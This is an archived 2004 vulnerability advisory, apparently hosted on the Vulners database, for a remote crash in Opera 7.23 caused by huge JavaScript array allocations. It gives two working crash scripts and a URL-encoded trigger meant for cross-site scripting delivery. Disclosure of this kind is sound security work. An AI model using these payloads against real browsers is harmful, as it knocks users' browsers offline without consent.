Vulners
Lucene search
opera723.txt
`Opera Array Allocation Managment Exploit
=====================================
Dicovered by- d3thStaR [!AM] <d3thStaR at rootthief.com>
Greets: !AM Crew, Atomix, d3thstar, mgrd, 0x29A Crew, rootthief.com.
Sources: Safari Overflow Exploit- kang
Confirmed products effected- Opera 7.23 Linux, Opera 7.23 Windows
=======Description of Problem=======
Someone could remotely seg-fault the Opera web-browser by creating an array allocation managment error.
<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>
<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>
Results in crashed client. No, severe, damage; did loose a 'Note' on one test.
=======Precautions=======
Be aware of cross-site scripting attacks.
Known URL triggers: %40%3cscript%3evar%20bam%20%3d%20new%20Array%280x2
3000000%29%3b%20bam%2esort%28new%20Function%28%22r
eturn%201%22%29%29%3b%3c%2fscript%3e
Vendor- Opera.com
Notified- 3/12/04_1:04am/Central
d3thStaR
<d3thStaR at rootthief.com>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Mar 2004 00:00Current